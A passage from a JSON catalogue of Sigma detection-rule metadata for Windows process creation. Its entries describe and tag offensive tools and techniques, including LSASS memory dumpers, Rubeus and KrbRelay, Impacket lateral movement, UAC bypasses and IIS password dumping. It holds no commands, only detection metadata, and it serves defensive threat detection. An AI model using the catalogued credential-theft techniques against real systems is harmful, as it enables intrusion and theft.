dumps the lsass.exe process memory", - "uuid": "2704ab9e-afe2-4854-a3b1-0c0706d03578", - "value": "Dumpert Process Dumper", - "meta": { - "refs": [ - "https://github.com/outflanknl/Dumpert", - "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_dumpert.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2020/02/04", - "filename": "proc_creation_win_hack_dumpert.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Very unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects command line parameters used by Hydra password guessing hack tool", - "uuid": "aaafa146-074c-11eb-adc1-0242ac120002", - "value": "Hydra Password Guessing Hack Tool", - "meta": { - "refs": [ - "https://github.com/vanhauser-thc/thc-hydra", - "https://attack.mitre.org/techniques/T1110/001/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_hydra.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110", - "attack.t1110.001" - ], - "creation_date": "2020/10/05", - "filename": "proc_creation_win_hack_hydra.yml", - "author": "Vasiliy Burov", - "level": "high", - "falsepositive": [ - "Software that uses the caret encased keywords PASS and USER in its command line" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", - "uuid": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", - "value": "Inveigh Hack Tool", - "meta": { - "refs": [ - "https://github.com/Kevin-Robertson/Inveigh", - "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_inveigh.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2022/10/24", - "filename": "proc_creation_win_hack_inveigh.yml", - "author": "Nasreddine Bencherchali", - "level": "critical", - "falsepositive": [ - "Very unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects command line parameters used by Koadic hack tool", - "uuid": "5cddf373-ef00-4112-ad72-960ac29bac34", - "value": "Koadic Execution", - "meta": { - "refs": [ - "https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/", - "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js", - "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_koadic.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007" - ], - "creation_date": "2020/01/12", - "filename": "proc_creation_win_hack_koadic.yml", - "author": "wagga, Jonhnathan Ribeiro, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of KrbRelay, a Kerberos relaying tool", - "uuid": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", - "value": "KrbRelay Hack Tool", - "meta": { - "refs": [ - "https://github.com/cube0x0/KrbRelay", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_krbrelay.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ], - "creation_date": "2022/04/27", - "filename": "proc_creation_win_hack_krbrelay.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", - "uuid": "12827a56-61a4-476a-a9cb-f3068f191073", - "value": "KrbRelayUp Hack Tool", - "meta": { - "refs": [ - "https://github.com/Dec0ne/KrbRelayUp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_krbrelayup.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" - ], - "creation_date": "2022/04/26", - "filename": "proc_creation_win_hack_krbrelayup.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", - "uuid": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", - "value": "Rubeus Hack Tool", - "meta": { - "refs": [ - "https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/", - "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", - "https://github.com/GhostPack/Rubeus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" - ], - "creation_date": "2018/12/19", - "filename": "proc_creation_win_hack_rubeus.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", - "uuid": "b1876533-4ed5-4a83-90f3-b8645840a413", - "value": "SafetyKatz Hack Tool", - "meta": { - "refs": [ - "https://github.com/GhostPack/SafetyKatz", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_safetykatz.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2022/10/20", - "filename": "proc_creation_win_hack_safetykatz.yml", - "author": "Nasreddine Bencherchali", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of SecurityXploded Tools", - "uuid": "7679d464-4f74-45e2-9e01-ac66c5eb041a", - "value": "SecurityXploded Tool", - "meta": { - "refs": [ - "https://securityxploded.com/", - "https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_secutyxploded.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555" - ], - "creation_date": "2018/12/19", - "filename": "proc_creation_win_hack_secutyxploded.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", - "uuid": "26488ad0-f9fd-4536-876f-52fea846a2e4", - "value": "SharPersist Usage", - "meta": { - "refs": [ - "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit", - "https://github.com/mandiant/SharPersist", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053" - ], - "creation_date": "2022/09/15", - "filename": "proc_creation_win_hack_sharpersist.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects SharpLdapWhoami, a whoami alternative by asking the LDAP service on a domain controller", - "uuid": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", - "value": "SharpLdapWhoami", - "meta": { - "refs": [ - "https://github.com/bugch3ck/SharpLdapWhoami", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpldapwhoami.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" - ], - "creation_date": "2022/08/29", - "filename": "proc_creation_win_hack_sharpldapwhoami.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Programs that use the same command line flags" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", - "uuid": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", - "value": "SysmonEOP Hack Tool", - "meta": { - "refs": [ - "https://github.com/Wh04m1001/SysmonEoP", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sysmoneop.yml" - ], - "tags": [ - "cve.2022.41120", - "attack.t1068", - "attack.privilege_escalation" - ], - "creation_date": "2022/12/04", - "filename": "proc_creation_win_hack_sysmoneop.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Windows Credential Editor (WCE)", - "uuid": "7aa7009a-28b9-4344-8c1f-159489a390df", - "value": "Windows Credential Editor", - "meta": { - "refs": [ - "https://www.ampliasecurity.com/research/windows-credentials-editor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_wce.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" - ], - "creation_date": "2019/12/31", - "filename": "proc_creation_win_hack_wce.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Another service that uses a single -s command line switch" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", - "uuid": "ca621ba5-54ab-4035-9942-d378e6fcde3c", - "value": "HandleKatz LSASS Dumper Usage", - "meta": { - "refs": [ - "https://github.com/codewhitesec/HandleKatz", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_handlekatz.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2022/08/18", - "filename": "proc_creation_win_handlekatz.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", - "uuid": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", - "value": "Password Cracking with Hashcat", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat", - "https://hashcat.net/wiki/doku.php?id=hashcat", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hashcat.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110.002" - ], - "creation_date": "2021/12/27", - "filename": "proc_creation_win_hashcat.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Tools that accidentally use the same command line flags and values" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", - "uuid": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", - "value": "File Download with Headless Browser", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1478234484881436672?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_headless_browser_file_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/01/04", - "filename": "proc_creation_win_headless_browser_file_download.yml", - "author": "Sreeman, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Identifies usage of hh.exe executing recently modified .chm files.", - "uuid": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", - "value": "HH.exe Execution", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md", - "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.001" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_hh_chm.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of hh.exe to execute/download remotely hosted .chm files.", - "uuid": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", - "value": "HH.exe Remote CHM File Execution", - "meta": { - "refs": [ - "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", - "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_http.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.001" - ], - "creation_date": "2022/09/29", - "filename": "proc_creation_win_hh_chm_http.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.", - "uuid": "ae9b0bd7-8888-4606-b444-0ed7410cb728", - "value": "Writing Of Malicious Files To The Fonts Folder", - "meta": { - "refs": [ - "https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hiding_malware_in_fonts_folder.yml" - ], - "tags": [ - "attack.t1211", - "attack.t1059", - "attack.defense_evasion", - "attack.persistence" - ], - "creation_date": "2020/04/21", - "filename": "proc_creation_win_hiding_malware_in_fonts_folder.yml", - "author": "Sreeman", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.", - "uuid": "40f9af16-589d-4984-b78d-8c2aec023197", - "value": "High Integrity Sdclt Process", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/6", - "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_high_integrity_sdclt.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" - ], - "creation_date": "2020/05/02", - "filename": "proc_creation_win_high_integrity_sdclt.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", - "uuid": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", - "value": "CreateMiniDump Hacktool", - "meta": { - "refs": [ - "https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2019/12/22", - "filename": "proc_creation_win_hktl_createminidump.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of UACMe (a tool used for UAC bypass) via default PE metadata", - "uuid": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", - "value": "UAC Bypass Tool UACMe Akagi", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "proc_creation_win_hktl_uacme_uac_bypass.yml", - "author": "Christian Burkard, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)", - "uuid": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", - "value": "HTML Help Shell Spawn", - "meta": { - "refs": [ - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/", - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_html_help_spawn.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.001", - "attack.t1218.010", - "attack.t1218.011", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1047", - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1218" - ], - "creation_date": "2020/04/01", - "filename": "proc_creation_win_html_help_spawn.yml", - "author": "Maxim Pavlunin", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", - "uuid": "023394c4-29d5-46ab-92b8-6a534c6f447b", - "value": "Suspicious HWP Sub Processes", - "meta": { - "refs": [ - "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", - "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1", - "https://twitter.com/cyberwar_15/status/1187287262054076416", - "https://blog.alyac.co.kr/1901", - "https://en.wikipedia.org/wiki/Hangul_(word_processor)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1203", - "attack.t1059.003", - "attack.g0032" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_hwp_exploits.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", - "uuid": "4ae81040-fc1c-4249-bfa3-938d260214d9", - "value": "Use Icacls to Hide File to Everyone", - "meta": { - "refs": [ - "https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_icacls_deny.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ], - "creation_date": "2022/07/18", - "filename": "proc_creation_win_icacls_deny.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", - "uuid": "97dbf6e2-e436-44d8-abee-4261b24d3e41", - "value": "Microsoft IIS Connection Strings Decryption", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_connection_strings_decryption.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ], - "creation_date": "2022/09/28", - "filename": "proc_creation_win_iis_connection_strings_decryption.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", - "uuid": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", - "value": "Disable Windows IIS HTTP Logging", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_http_logging.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ], - "creation_date": "2022/01/09", - "filename": "proc_creation_win_iis_http_logging.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", - "uuid": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", - "value": "Microsoft IIS Service Account Password Dumped", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html", - "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA", - "https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_service_account_password_dumped.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ], - "creation_date": "2022/11/08", - "filename": "proc_creation_win_iis_service_account_password_dumped.yml", - "author": "Tim Rauch, Janantha Marasinghe", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", - "uuid": "f11f2808-adb4-46c0-802a-8660db50fa99", - "value": "ImagingDevices Unusual Parent Or Child Processes", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_imaging_devices_unusual_parents.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution" - ], - "creation_date": "2022/09/27", - "filename": "proc_creation_win_imaging_devices_unusual_parents.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", - "uuid": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", - "value": "Impacket Tool Execution", - "meta": { - "refs": [ - "https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_compiled_tools.yml" - ], - "tags": [ - "attack.execution", - "attack.t1557.001" - ], - "creation_date": "2021/07/24", - "filename": "proc_creation_win_impacket_compiled_tools.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of the impacket tools" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", - "uuid": "10c14723-61c7-4c75-92ca-9af245723ad2", - "value": "Impacket Lateralization Detection", - "meta": { - "refs": [ - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py", - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py", - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py", - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_lateralization.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.003" - ], - "creation_date": "2019/09/03", - "filename": "proc_creation_win_impacket_lateralization.yml", - "author": "Ecco, oscd.community, Jonhnathan Ribeiro", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "uuid": "5f6a601c-2ecb-498b-9c33-660362323afa", - "value": "Root Certificate Installed From Susp Locations", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", - "https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.004" - ], - "creation_date": "2022/09/09", - "filename": "proc_creation_win_import_cert_susp_locations.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe).", - "uuid": "fa47597e-90e9-41cd-ab72-c3b74cfb0d02", - "value": "Indirect Command Execution", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1202/T1202.md", - "https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_indirect_cmd.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_indirect_cmd.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "level": "low", - "falsepositive": [ - "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts.", - "Legitimate usage of scripts." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of native Windows tool, forfiles to execute a file. Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.", - "uuid": "a85cf4e3-56ee-4e79-adeb-789f8fb209a8", - "value": "Indirect Command Exectuion via Forfiles", - "meta": { - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-73d61931b2c77fde294189ce5d62323b416296a7c23ea98a608f425566538d1a", - "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_indirect_command_execution_forfiles.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2022/10/17", - "filename": "proc_creation_win_indirect_command_execution_forfiles.yml", - "author": "Tim Rauch (rule), Elastic (idea)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", - "uuid": "ce7cf472-6fcc-490a-9481-3786840b5d9b", - "value": "InfDefaultInstall.exe .inf Execution", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution", - "https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_infdefaultinstall.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2021/07/13", - "filename": "proc_creation_win_infdefaultinstall.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects encoded base64 MZ header in the commandline", - "uuid": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", - "value": "Base64 MZ Header In CommandLine", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_inline_base64_mz_header.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/07/12", - "filename": "proc_creation_win_inline_base64_mz_header.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of WinAPI Functions via the commandline as seen used by threat actors via the tool winapiexec", - "uuid": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", - "value": "Accessing WinAPI Via CommandLine", - "meta": { - "refs": [ - "https://twitter.com/m417z/status/1566674631788007425", - 